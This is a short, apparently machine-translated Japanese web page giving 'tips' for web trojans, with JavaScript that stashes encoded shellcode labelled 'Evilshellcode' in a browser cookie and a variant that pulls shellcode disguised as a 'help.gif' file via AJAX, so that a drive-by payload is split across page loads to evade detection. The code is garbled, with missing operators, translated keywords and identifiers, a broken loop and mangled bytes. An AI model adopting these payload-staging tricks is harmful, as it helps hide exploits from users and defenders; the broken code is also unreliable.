インターネットホースのヒント実装_ハッカーの性質の分析

Cookie のサンプル コード:

コードをコピー コードは次のとおりです:

//Storage
function setCookie (sVar, sVal){
theCookie = sVar '=' sVal '; 期限切れ=2020 年 7 月 1 日金曜日 09:45:27 UTC';
document.cookie = theCookie;}
シェルコード="�90�90 fc�7c�f9�35-49~db�d8�73 4euec..."
setCookie('Evilshellcode', シェルコード);
//出てください
function getCookie(sVar) {
cookies = document.cookie.split('; ');
for(var i = 1; i if(cookies[i - 1].split(' =')[0] == sVar){return cookies[i - 1].split('=')[1];}}
return ''
}
a= unescape(getCookie) ('Evilshellcode'))

Cookie が保存されている場合、Cookie は 2 回ハングする可能性があります。1 回目のハングでは、Cookie の書き込みコードは無害ですが、2 回目はハングします。

ajax を使用して

コードをコピーする コードは次のとおりです。

var シェルコード = $.ajax({
url: "help.gif",
async: false
}).responseText

ヘルプ.gif コンテンツ

�90�90 fc�7c�f9�35-49~db�d8�73 4euec